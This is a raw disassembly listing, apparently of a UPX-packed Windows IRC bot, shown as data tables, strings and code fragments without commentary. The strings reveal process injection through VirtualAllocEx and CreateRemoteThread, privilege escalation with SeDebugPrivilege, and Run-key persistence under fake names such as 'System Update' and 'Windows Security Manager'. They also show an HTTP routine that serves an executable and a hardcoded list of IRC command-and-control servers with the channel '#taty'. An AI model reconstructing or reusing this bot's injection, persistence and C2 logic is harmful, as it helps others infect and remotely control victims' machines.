dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h dword_315059D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D96+102�o
align 4
aUterm13_2i db 'uterm13.2i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D35�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025F6+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D20�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D96+109�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D96+FB�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D96+F4�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D96+E7�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D96+D5�o
aU13_2i db 'u13.2i',0 ; DATA XREF: sub_31501D96+C9�o
align 4
aU13i db 'u13i',0 ; DATA XREF: sub_31501D96+BD�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D96+B1�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D96+A5�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D96+99�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D96+8D�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D96+81�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31501D96+75�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D96+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D96+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D96+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D96+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D96+3B�o
align 4
aU13_2ix db 'u13.2ix',0 ; DATA XREF: sub_31501D96+22�o
asc_31505B8C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F6B+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F6B+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502277+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501BA8+23�o
; sub_31502548+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501BA8+1C�o
; sub_315025F6+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_315026C2+57�o
; sub_315026C2+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_315026C2+32�o
aClient db 'Client',0 ; DATA XREF: sub_315026C2+BC�o
; sub_315026C2+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_315026C2+37�o
; sub_315026C2+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502548+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502548+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502548+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502548+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502548+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502548+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502548+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502548+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502548+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502548+F�o
align 10h
asc_31505CF0: ; DATA XREF: sub_315025F6+56�o
; sub_31503608+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_315026C2+B7�o
unicode 0, <1>,0
dword_31505CF8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150283F+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502826+3�o
align 4
off_31505E14 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:315034C8�r
; UPX0:3150351A�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E5C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E58�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E54�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E50�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E48�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E40�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E3C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E38�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E28�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E24�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31505E14�o
; UPX1:31508401�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502CB7+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502CB7+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DEC+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+D9�o
; sub_31502DEC+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_3150302E+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_3150302E+C�o
; sub_315030B1:loc_31503153�o
align 4
a451 db '451',0 ; DATA XREF: sub_315030B1+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_315030B1+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31503183+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032FA+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:3150356A�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:31503460�o
align 4
a_: ; DATA XREF: UPX0:31503455�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31503608+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31503722+2E8�o
align 4
aQ: ; DATA XREF: sub_31503722+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_31503722+29D�o
align 10h
aI: ; DATA XREF: sub_31503722+253�o
unicode 0, <i>,0
asc_31506124: ; DATA XREF: sub_31503722+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31503722+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31503722+78�o
align 4
dd 9 dup(0)
dword_31506158 dd 0 ; sub_31501BA8+80�w
dword_3150615C dd 0 ; sub_31501BA8+2D�w ...
dword_31506160 dd 0 ; sub_31501A62:loc_31501B10�r ...
dword_31506164 dd 70h ; UPX0:31501D40�w ...
dword_31506168 dd 0 ; sub_31501D96+33�w
dword_3150616C dd 8 dup(0) dword_3150618C dd 0 ; sub_31502277+20�r
dword_31506190 dd 31500000h ; UPX0:31501D25�w
dword_31506194 dd 0 ; sub_315021B0+53�o ...
dword_31506198 dd 0 ; UPX0:31502326�w ...
word_3150619C dw 0 ; DATA XREF: sub_315020C4+3B�r
; sub_31502128:loc_31502189�r ...
align 10h
dword_315061A0 dd 0 ; sub_315026C2+110�w ...
dword_315061A4 dd 0 ; UPX0:31503553�w ...
dword_315061A8 dd 0 ; sub_31503722+E8�r ...
dword_315061AC dd 8 dup(0) ; sub_31503722+A�o
dword_315061CC dd 38Dh dup(0) dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 43010041h, 74616572h
dd 65764565h, 41746Eh, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 65440100h, 6574656Ch, 656C6946h
dd 47010041h, 614C7465h, 72457473h, 726F72h, 69784501h
dd 6F725074h, 73736563h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 6C010070h, 63727473h, 416E7970h, 65470100h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 74654701h
dd 636F7250h, 72646441h, 737365h, 616F4C01h, 62694C64h
dd 79726172h, 57010041h, 65746972h, 636F7250h, 4D737365h
dd 726F6D65h, 43010079h, 65736F6Ch, 646E6148h, 100656Ch
dd 6E65704Fh, 636F7250h, 737365h, 74654701h, 75646F4Dh
dd 6148656Ch, 656C646Eh, 47010041h, 69547465h, 6F436B63h
dd 746E75h, 65724301h, 4D657461h, 78657475h, 43010041h
dd 74616572h, 72685465h, 646165h, 65724301h, 50657461h
dd 65636F72h, 417373h, 74655301h, 6E657645h, 4F010074h
dd 456E6570h, 746E6576h, 45010041h, 54746978h, 61657268h
dd 49010064h, 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h
dd 746E65h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 61657243h, 69466574h, 41656Ch
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3275Dh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D18h, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B68h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3330h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11CDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3DA4h, 652Ch, 0C48BC800h, 0BC4B56DDh
dd 8BE18B0Ch, 0C371406Ah, 23231C47h, 5182363h, 9F080C14h
dd 4232323h, 8410FC00h, 7CF83A10h, 107C777Eh, 0E8B81078h
dd 6EFBE9BBh, 0B8E6B56h, 0D01D0CECh, 163B40B8h, 27EFBAE9h
dd 930520CCh, 1308E719h, 0CD180701h, 57850802h, 0F7C90B07h
dd 2F2B0096h, 0BE4A0030h, 4EE0E2E7h, 41601F57h, 57D93758h
dd 9ED0h, 443FFFBh, 746858EBh, 2F3A7074h, 3732312Fh, 0FF01302Eh
dd 31BFFD91h, 3030383Ah, 652E652Fh, 0DF6578h, 697A6F4Dh
dd 6D616C6Ch, 2FDBFFFFh, 5DDF2734h, 0B966C933h, 758D01F1h
dd 8AFE8B05h, 7993C06h, 0FF8ADF46h, 302C06BFh, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 65622EFAh, 0FF6FFF67h, 93712EFBh
dd 1201C999h, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0FBADD8BAh, 0A91C14F7h, 0F3C91A98h, 8608F198h, 10C57102h
dd 0FFD9FD87h, 37CB5F90h, 1C965992h, 0E4143A78h, 0A7D7157h
dd 0F6DF7D3Ah, 0F34571C9h, 8904F19Dh, 9C04F109h, 0CE91FEC7h
dd 67B44011h, 10F0E3F3h, 0B20BD11Ch, 0F7FB1B59h, 0C99B6076h
dd 14D90125h, 0CA17A204h, 0F9647F99h, 688D2B58h, 1AAE9161h
dd 1D966661h, 0DADEDB11h, 50B22867h, 149900C8h, 265557DCh
dd 0DBBDBF12h, 0C0A44E3Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 0FBBB0FCBh, 1C3C71D9h, 21E424FFh, 0CDCDCF1Ah, 0F72C668Fh
dd 8166D93Fh, 0B0FB133Fh, 0CDC383B8h, 64A85D12h, 0C96CDF3Bh
dd 0AE251DCBh, 93FD0C24h, 485AFEC9h, 14C096A6h, 0A7294C1Ch
dd 609CF3EBh, 0BA9767EFh, 0F43416EAh, 0DBF57126h, 0FFF77ECDh
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 0B7AAA8ECh, 8519F0ABh
dd 1FFFF90h, 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0F6FFC999h
dd 0F55BBE5Fh, 0F2E9FCFCh, 0FCF7EBFCh, 0D9ABAAF5h, 0AAF934C7h
dd 9F25B459h, 2AFF97FDh, 0ACC9662Ah, 0B7819093h, 83639D90h
dd 9271CDC9h, 3519BF30h, 0C2FBB083h, 95DC1451h, 2A91720Ah
dd 0D2EEC871h, 0FFFFEDFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh
dd 12B9C89Ah, 474A9A8Bh, 0AB9E5958h, 0A319DB9Bh, 6FFFFEDFh
dd 0A26CEC20h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h
dd 0EB8D2E96h, 0FFE68584h, 9A85D812h, 99D125Ah, 0F8105A9Ah
dd 0B725D599h, 49FFDDB7h, 0FEFD7F66h, 5AA98712h, 850295C2h
dd 91048212h, 0A89BF35Ah, 0CFF7CB6Dh, 53FF855Dh, 8F72424Dh
dd 1874485Dh, 0FE85C853h, 2006206h, 0FFFFF1ADh, 4E204350h
dd 4F575445h, 50204B52h, 52474F52h, 31204D41h, 0FFFB17CDh
dd 414CF6B1h, 0A024D4Eh, 646E6957h, 2073776Fh, 20726F66h
dd 2DD60357h, 676B7F6Dh, 70756F72h, 611A330Eh, 5E234D27h
dd 32E96C3Eh, 32322158h, 4E312E32h, 6F92054h, 2018DA6Bh
dd 0A470323Ch, 50BB738Bh, 0A07192Bh, 5123FF0Ch, 7D8363h
dd 140A1104h, 0BBD40520h, 0CABB5BE8h, 4B4C0069h, 505353h
dd 0FB829756h, 8C91EDFh, 240057E0h, 64006Eh, 77006Fh, 0F6F63A73h
dd 30749B62h, 398C0901h, 3233500h, 1D44B6E6h, 0DA00072Eh
dd 644E7901h, 0DA2008ABh, 92649A87h, 26039F57h, 6D8360C8h
dd 47234601h, 73FF4007h, 60F23h, 1F011006h, 0E0888A15h
dd 0FF600048h, 4FE5FFh, 6A198144h, 49E4F27Ah, 30AF281Ch
dd 67107425h, 214FE153h, 0DF5C44DFh, 4003075h, 2DAE6BAFh
dd 5ABD075Ch, 8D615C08h, 4D75DC8Dh, 36072Eh, 30772E38h
dd 0DB7BAF61h, 0EC00491Bh, 3B240043h, 2D63003Fh, 64CF201Fh
dd 4DC08A2h, 0E41EC240h, 0FF16BFh, 0E00DEDEh, 19F1600h
dd 37EF2602h, 28404261h, 8B110319h, 0B868DECBh, 0D374D96Ch
dd 2A630070h, 0BE4296DBh, 9F256B9Ch, 75480E10h, 43D81DDh
dd 5413541Bh, 0FB9F265Ah, 5963D6DCh, 0CBC75C22h, 5876545h
dd 0F3483B55h, 10030B00h, 110B848h, 349FFFFBh, 286A0105h
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 655FF52Eh, 5D1FF85Fh
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 9F25D160h, 0F40CEC8Bh
dd 0CA060A3h, 790F200Ch, 0CB10CA0h, 4EFFBE00h, 880CA08Eh
dd 90040h, 703ECh, 49E11EC1h, 4F401495h, 0BF40707Ch, 0B2297B22h
dd 13430700h, 3FF09E79h, 138578h, 0E9A65BABh, 2FF81013h
dd 273C635h, 230EFEFFh, 30C1D240h, 84083658h, 0E4F24388h
dd 10B97DD3h, 0B801FFEEh, 0F2200C10h, 0AD793661h, 0F7F070Dh
dd 0E59F25D8h, 70011815h, 90060F84h, 0F84790Fh, 2000F95h
dd 0FC9E4D87h, 6C0F847Fh, 0C89A000Fh, 0A884AADEh, 0CA13436Fh
dd 1F8C093Fh, 50586E69h, 3C725020h, 0C0A6DBh, 39014446h
dd 0C93C6B32h, 123C844Fh, 41027515h, 7B220053h, 941C840Dh
dd 0AFFF9B01h, 0C606EB1Ch, 73255C5Ch, 6370695Ch, 9F816624h
dd 0ECFFF97Fh, 0E4FF071Ch, 44655300h, 67756265h, 6C697669h
dd 41656765h, 0B266DB64h, 73756AFFh, 6B6F5474h, 73176E65h
dd 75126F4Ch, 927F76FDh, 6C615670h, 17416575h, 6F28704Fh
dd 2FFE0C63h, 347324B6h, 76646143h, 33697061h, 12E2AEE3h
dd 6574757Fh, 13316D72h, 0BB036932h, 65A37F12h, 72545F15h
dd 39577961h, 0EF72431Bh, 65DBEDDCh, 65521E61h, 54056F6Dh
dd 56140C68h, 6E747269h, 75B6D6EDh, 5328415Ch, 520F7845h
dd 5F466E72h, 4B35D67Ah, 4822F3F5h, 83505454h, 89712FDEh
dd 5B322040h, 0D4B4F20h, 0DBFD010Ah, 6F4BFDADh, 2D02446Eh
dd 7467044Ch, 25203A68h, 2961ED75h, 282F189Bh, 0F4B97954h
dd 266B7DB6h, 696C70A7h, 15698563h, 0A32D782Fh, 0CB77EED8h
dd 6D6F632Dh, 65CD7270h, 5BDF5764h, 0D4FF28h, 544547h
dd 11640266h, 0DD2BFDA1h, 6D9573D7h, 0B1637673h, 6DA2DDD7h
dd 65017765h, 5F320F08h, 0FDCCDCE6h, 34317517h, 507F703h
dd 9A696E07h, 3132032Eh, 0D8133930h, 38B3937Bh, 2306781Fh
dd 0C9BDC07h, 4F303132h, 7F7F7529h, 0BB2098FBh, 52455355h
dd 4E084449h, 65849h, 48217B59h, 253AE8A1h, 0C5A7CD64h
dd 53FFF2F6h, 5754464Fh, 5C455241h, 736F694Dh, 0DD5CC36Fh
dd 0B783F0D6h, 7275435Ch, 0C8560972h, 0B55CFE73h, 52C3E142h
dd 7953BC75h, 0F25290FDh, 0E7A1877Fh, 6664579Ah, 6E687361h
dd 6473647Ah, 76D6126Ch, 77495313h, 5C573F61h, 0ED860A1h
